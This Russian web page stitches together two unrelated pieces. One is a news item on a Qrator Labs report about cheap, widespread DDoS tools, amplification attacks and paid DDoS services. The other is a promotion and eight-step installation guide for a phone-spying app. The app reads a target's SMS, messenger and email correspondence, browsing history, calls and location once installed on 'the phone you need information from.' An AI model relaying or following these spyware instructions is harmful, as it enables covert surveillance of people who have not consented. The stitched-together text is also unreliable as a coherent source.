Инструменты для DDoS-атак получили массовое распространение

2d630081-85a2-4d1a-9944-3a3628239bf4Специалисты Qrator Labs считают, что всеобщее распространение инструментов для проведения DDoS-атаки стало доступным даже людям с низким уровнем квалификации. Ранее подобные хакерские действия требовали изучения большого количества специализированного материала, который не так просто было найти в свободном доступе. С конца 2014 года начали свой рост Volumetric-атаки, которые используются при нападении на крупные целевые системы.

Эта тактика проведения DDoS привязывается к конкретным событиям. Например, серьёзная активность наблюдалась в период Олимпийских игр, или во время падения малазийского Боинга. Атака мощностью 10 Gbps происходит примерно через день, а 100 Gbps – примерно раз в неделю. Атаки наблюдались и на СМИ, и на крупные финансовые организации, и на частные банковские структуры. Пострадала и биржа Forex, отдельные брокеры которой не могли предоставлять услуги своим клиентам из-за перегрузки серверов.

Наиболее популярным при проведении атаки остаётся Amplification, когда сообщения об ошибках передаются на DNS-сервера, вызывая перегруз системы. Ранее предварительно формировался и настраивался ботнет, а теперь используется подмена IP-адреса жертвы, поэтому ресурсы злоумышленникам требуются значительно меньшие, чем это было пару лет тому назад. В широком доступе появляются точные схемы для реализации такого атакующего потенциала. В 2014 году большой популярностью среди хакеров были NTP- и SSDP-амплификаторы, в то время как в 2013 году именно DNS-запросы были наиболее востребованными.

Организация DDoS-атак перестала быть уделом отдельных энтузиастов, ныне на платной основе эта услуга оказывается многими группами хакеров. Уменьшается стоимость и аренды серверов, массивные сети собираются за совсем небольшие деньги, поскольку не требуется большой мощности каждой отдельной машины. Один гигабайт такого трафика сейчас оценивается в 10-20$, в зависимости от исполнителя такой атаки. Методики защиты варьируются, но ничего совершенного в этой области не существует. Всегда есть вероятность перегрузки сервера, особенно если поставщик услуг не является мощной структурой с надёжными параметрами безопасности. Всё это отмечается в отчёте Qrator Labs.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.